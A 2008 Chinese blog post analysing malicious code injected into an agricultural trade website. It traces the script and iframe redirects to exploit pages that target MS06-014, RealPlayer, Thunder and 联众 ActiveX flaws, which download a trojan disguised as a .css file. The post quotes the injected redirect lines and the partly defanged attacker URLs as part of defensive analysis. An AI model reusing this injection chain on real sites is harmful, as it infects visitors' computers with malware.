综合

img Purpleendurer

某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu

发表于2008/9/29 17:17:00  732人阅读

分类: 系统安全

某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu

 

endurer 原创
2008-09-29 第1

 

发现了挺久了,不过现在才有时间来分析一下。

 

该网页面发现代码:
/---
<script language="javascript" type="text/javascript" src="hxxp://a*lim*o*ma*.com/header_bg.gif"></script>
---/

#1 hxxp://a*lim*o*ma*.com/header_bg.gif 包含代码:
/---
document.write("<iframe src=hxxp://www.*eq**w0**06.cn/zzll/1.htm width=50 height=0 border=0></iframe>");}
---/


#1.1 hxxp://www.*eq**w0**06.cn/zzll/1.htm 包含代码:
/---
<Iframe src="hxxp://max**-**7*.cn/a154/fxx.htm" width=100 height=0></Iframe>
---/


#1.1.1 hxxp://max**-**7*.cn/a154/fxx.htm

 

会引用如下网页:

 

#1.1.1.1 hxxp://max**-**7*.cn/a154/fx.htm
检查用户浏览器类型,如果是MSIE,则输出代码:

/---
<iFrame src=ilink.html width=100 height=0></iframe>
---/

否则输出:

/---
<iframe src=flink.html width=100 height=0></iframe>
---/

 

#1.1.1.1.1 hxxp://max**-**7*.cn/a154/ilink.html
检查flash插件版本,并相应的下载:i115.swf、i45.swf、i16.swf、i64.swf、i28.swf、i47.swf。

 

#1.1.1.1.2 hxxp://max**-**7*.cn/a154/flink.html
检查flash插件版本,并相应的下载:f115.swf、f64.swf、f47.swf、f45.swf、f28.swf、f16.swf。


#1.1.1.2 hxxp://max**-**7*.cn/a154/ss.html
/---
文件不存在
---/

 

#1.1.1.3 hxxp://max**-**7*.cn/a154/ms06014.htm

利用ms06-014漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css


文件说明符 : E:/test/a154.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-25 12:6:20
修改时间 : 2008-9-25 12:11:48
大小 : 12113 字节 11.849 KB
MD5 : be60b3827121531748a25cf644e8668b
SHA1: A5FF6B8DECA69227CB6F70D7FEE2E7D111DF6365
CRC32: 8fbfd7c7

 

卡巴斯基报为:Trojan-Dropper.Win32.Agent.xdu,瑞星报为:Trojan.DL.Win32.Mnless.bes

 

#1.1.1.4 hxxp://max**-**7*.cn/a154/GLWORLD.html

利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

 

#1.1.1.5 hxxp://max**-**7*.cn/a154/sina.htm
/---
文件不存在
---/

 

#1.1.1.6 hxxp://max**-**7*.cn/a154/UU.htm
/---
文件不存在
---/

 

#1.1.1.7 hxxp://max**-**7*.cn/a154/Thunder.html

利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

 

#1.1.1.8 hxxp://max**-**7*.cn/a154/real.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
不攻击IE7

 

#1.1.1.9 hxxp://max**-**7*.cn/a154/Real.html

利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

阅读全文
0 0

相关文章推荐

img
取 消
img